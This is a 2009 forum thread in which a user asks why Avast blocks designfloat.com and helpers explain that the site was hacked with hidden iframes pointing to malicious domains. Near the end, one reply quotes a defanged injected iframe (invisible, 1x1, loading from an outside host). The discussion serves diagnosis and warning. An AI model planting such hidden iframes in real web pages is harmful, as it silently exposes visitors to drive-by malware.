False Positive?

Every time I visit designfloat.com, Avast picks up a virus there. This hasn’t always happened, but just in the past couple of weeks or so. What is it that it’s picking up and why can’t I seem to visit it, when it’s obvious that others can? Are there settings I would have to change in order to visit the site? Thank you for any and all help that anyone can give.

Attached in an image of the virus alert I have been getting.

~emmcee

Welcome emmcee

The site has been hacked which is a common occurence right now.

You should contact the Webmaster at the site and inform them that they are infected and you can reference this topic if they need more information.

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you could contact its webmaster.
Some ones without avast protection could being able to get that site indeed…

Isn’t there an iframe in the top of the page?

YoKenny,

Thanks for your help. I have asked around and no one else (that I know of) seems to be experiencing the same thing that I am. I wonder why that is? The site has been updated regularly as if nothing has happened. I can’t even stay at the site long enough to get the webmasters contact information unfortunately, so I’m not sure how to go about doing that. I do appreciate the help though. Thanks again.

~emmcee

Tech,

So it is possible for others to have visited the site with no problem whatsoever? I suppose that makes sense cause of all the different virus scans and what they pick up and whatnot. I’m trying to find out some sort of contact information so I can inform them of it. Thanks for your help.

~emmcee

Yes. avast detection is quite accurate and fast in this point. There aren’t that many antivirus that offer this protection layer.

Tech,

That would explain why not many others have experienced it then. Thanks again!

~emmcee

There are no fewer than 6 hidden iframe tabs on a single line inserted before any other coding on the page, see image. I have broken this line down so you can see it more easily.

DavidR,

So these hidden iframes are what is causing my virus scan to go off? Is it in fact a virus?

~emmcee

Yes that is what causes avast to alert.

The iframe in itself isn’t a virus, but the link to another site (nakulpi.net) to run a file is could possibly infect your system (assuming you didn’t have a competent AV).

Thanks so much for your help. I see what you are saying now. Unfortunately, I cannot seem to contact the webmaster to inform him/her of this issue. I came across two different email addresses related to the site, but both emails were returned. Ah well, I tried. Hopefully they will become aware of the issue soon.

There is another one just notified by another scanner see, http://www.blacklistdoctor.com/bld/diagnose.php?URL=www.designfloat.com&scan_id=8229.

I did a whois check on the designfloat.com domain and that revealed nothing of use, seems like they don’t want to be bugged and are using PrivacyProtect.org.

Hi DavidR,

Initiating server query …
Looking up IP address for domain: wXw.designfloat.com
The IP address for the domain is: 72.47.224.104
Connecting to the server on standard HTTP port: 80
[Connected] Requesting the server’s default page.
The server returned the following response headers:
HTTP/1.1 200 OK
Date: Fri, 22 May 2009 17:15:08 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.6
Set-Cookie: bb2_screener_=1243012509+IP; path=/
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11611
Connection: close
Content-Type: text/html
Query complete.

1 infected page with:^

 "EDITED" ^iframe src="hxtp://ibalefo.net/?click=80CE5D" width=1 height=1 style="visibility:hidden;position:absolute"

pol

That is the one in the above link to blacklistdoctor.com.